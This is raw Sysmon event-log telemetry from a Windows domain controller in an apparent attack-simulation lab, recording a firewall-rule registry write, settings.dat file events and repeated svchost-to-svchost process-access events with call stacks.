12:02:18.379{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{AF30A5A7-EB7B-4B91-95C1-4E443CEEB598}v2.26|Action=Block|Active=TRUE|Dir=In|Name=@{Microsoft.Windows.AssignedAccessLockApp_1000.14393.2068.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.AssignedAccessLockApp/Resources/PackageDisplayName}|Desc=@{Microsoft.Windows.AssignedAccessLockApp_1000.14393.2068.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.AssignedAccessLockApp/Resources/PackageDescription}|LUOwn=S-1-5-21-4055678433-3894535204-3898404691-500|AppPkgId=S-1-15-2-2705751783-1496458293-2835996032-3143071717-1071345625-677459937-2760321769|EmbedCtxt=@{Microsoft.Windows.AssignedAccessLockApp_1000.14393.2068.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.AssignedAccessLockApp/Resources/PackageDisplayName}| 11241100x80000000000000005514Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.364{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\Settings\settings.dat2021-03-31 12:02:18.364 11241100x80000000000000005513Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.364{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\Settings\settings.dat2021-03-31 12:02:18.364 23542300x80000000000000005512Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.364{266CAFBE-64C6-6064-A900-00000000AE01}3404NT 
AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\Settings\settings.datMD5=A8308D2F3DDE0745E8B678BF69A2ECD0,SHA256=7FBB3E503ED8A4A8E5D5FAB601883CBB31D2E06D6B598460E570FB7A763EE555,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005511Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.364{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\Settings\settings.datMD5=A8308D2F3DDE0745E8B678BF69A2ECD0,SHA256=7FBB3E503ED8A4A8E5D5FAB601883CBB31D2E06D6B598460E570FB7A763EE555,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005510Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.364{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3927867B699E61E69E19EA3F0C2208F9,SHA256=62159A29B23847B92F28C44C26153A90A7C214F78A427AB537684ED433909922,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005509Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:18.348{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005508Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.348{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005507Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:18.348{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005506Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.348{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005505Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:18.348{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005504Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.348{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005503Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:18.348{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005502Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.348{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005501Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:18.348{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005500Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.348{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005499Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:18.348{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005498Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.348{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005497Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:18.348{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005496Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.348{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
10341000x80000000000000005495Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.348{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005494Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.348{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
10341000x80000000000000005493Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.348{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005492Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.348{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
10341000x80000000000000005491Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.332{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005490Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.332{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
10341000x80000000000000005489Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.332{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005488Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
